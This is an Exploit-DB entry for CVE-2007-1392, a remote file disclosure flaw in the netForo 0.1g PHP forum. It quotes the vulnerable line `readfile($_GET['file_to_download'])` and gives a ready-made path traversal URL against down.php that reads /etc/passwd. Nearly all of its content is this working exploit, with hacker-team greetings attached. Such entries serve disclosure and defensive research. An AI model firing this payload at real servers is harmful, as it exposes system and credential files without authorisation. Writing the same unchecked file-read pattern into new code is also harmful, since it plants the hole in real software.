netForo! 0.1 - 'down.php?file_to_download' Remote File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-03-07 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-33891;CVE-2007-1392 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comnetForo_0.1g.zip

# netForo 0.1g(file_to_download)Remote File Disclosure Exploit
# D.Script: http://sourceforge.net/projects/netforo/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: readfile($_GET['file_to_download']);
# Exploit:[Path_netForo]/down.php?file_to_download=../../../../etc/passwd

# milw0rm.com [2007-03-08]